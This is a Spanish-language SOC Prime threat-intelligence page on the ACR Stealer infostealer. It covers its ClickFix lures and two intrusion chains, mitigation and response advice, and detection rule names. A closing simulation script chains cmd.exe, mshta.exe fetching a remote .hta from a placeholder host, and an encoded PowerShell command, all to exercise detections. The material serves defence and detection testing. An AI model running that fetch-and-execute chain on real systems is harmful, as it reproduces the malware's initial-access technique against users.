SOC Prime Bias: High

20 Jul 2026 06:25 UTC

ACR Stealer: Dos Cadenas de Intrusión Observadas Durante Aumento de Actividad de Amenazas

Author Photo
SOC Prime Team linkedin icon Seguir
ACR Stealer: Dos Cadenas de Intrusión Observadas Durante Aumento de Actividad de Amenazas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

ACR Stealer es una familia de malware que roba información utilizando señuelos de ingeniería social de estilo ClickFix para atacar entornos empresariales. El malware opera a través de dos cadenas principales de infección: una que depende de cargas útiles entregadas por WebDAV con cargadores de Python y comando y control basado en blockchain, y otra que utiliza MSHTA con entrega de cargas útiles esteganográficas. Su objetivo principal es robar credenciales de navegadores, tokens de autenticación y documentos sensibles.

Investigación

Microsoft Defender Experts observó un aumento de actividad entre finales de abril y mediados de junio de 2026. La investigación identificó dos caminos de ejecución separados: una campaña basada en disco que involucra Python y tareas programadas, y una campaña sin archivos que utiliza MSHTA y ejecución de shellcode en memoria. Los analistas también documentaron métodos avanzados de evasión, incluyendo modificación de marcas de tiempo, PowerShell ofuscado y resolutores de caída muertos respaldados por blockchain.

Mitigación

Las organizaciones deben capacitar a los usuarios para reconocer los mensajes de ClickFix y restringir la ejecución de scripts no confiables a través del control de aplicaciones. Reducir la exposición a la publicidad malintencionada y aplicar filtros web puede ayudar a interrumpir los intentos de acceso inicial. Fortalecer los puntos finales limitando la dependencia de credenciales almacenadas en el navegador y aplicando la autenticación multifactor también es esencial para reducir el riesgo de robo de credenciales.

Respuesta

Si se detecta esta actividad, los dispositivos afectados deben ser aislados inmediatamente y todas las credenciales y tokens potencialmente comprometidos deben ser rotados. Los tokens de sesión deben ser revocados y los investigadores deben revisar las conexiones salientes a recursos compartidos remotos o servicios de alojamiento de imágenes sospechosos. EDR en modo bloqueo debe ser utilizado para contener la amenaza y eliminar eficientemente los artefactos maliciosos.

Flujo de Ataque

Detecciones

Comportamiento de Evasión de Defensa de MSHTA LOLBAS Sospechoso mediante Detección de Comandos Asociados (vía process_creation)

Equipo SOC Prime
17 Jul 2026

LOLBAS Conhost (vía cmdline)

Equipo SOC Prime
17 Jul 2026

Tarea Programada a través de Objeto COM (vía powershell)

Equipo SOC Prime
17 Jul 2026

Descubrimiento de Información del Sistema Posible Usando el Módulo Wmi Powershell (vía powershell)

Equipo SOC Prime
17 Jul 2026

Detección de PowerShell Ofuscado y Tareas Programadas Haciéndose Pasar por Actualizaciones de Software [Windows Powershell]

Reglas AI SOC Prime
17 Jul 2026

Detección de Ejecución de ACR Stealer mediante Señuelos ClickFix [Creación de Procesos de Windows]

Reglas AI SOC Prime
17 Jul 2026

Ejecución de Simulación

Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa y Comandos del Ataque: El adversario apunta a un usuario con un falso ‘error del navegador’ (ClickFix). Una vez que el usuario copia y pega el comando en un terminal, cmd.exe se invoca. El comando instruye a mshta.exe para acceder a una URL remota y recuperar un script malicioso. Para evadir más fácilmente la detección de cadenas simples, el script utiliza powershell.exe con un comando codificado (-Enc) para descargar y ejecutar el malware ACR Stealer en memoria, evitando el escaneo tradicional basado en archivos.

  • Script de Prueba de Regresión:

    # Simulación de Cadena ClickFix de ACR Stealer
    # Paso 1: Simular el envoltorio cmd.exe
    # Paso 2: Invocar mshta.exe con una URL
    # Paso 3: Seguido de un comando PowerShell codificado
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulando Ejecución de Carga Útil de ACR Stealer'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powershell.exe -Enc $encodedCommand"
  • Comandos de Limpieza:

    # No se crean archivos persistentes en esta simulación, pero asegúrese de que no queden procesos huérfanos
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue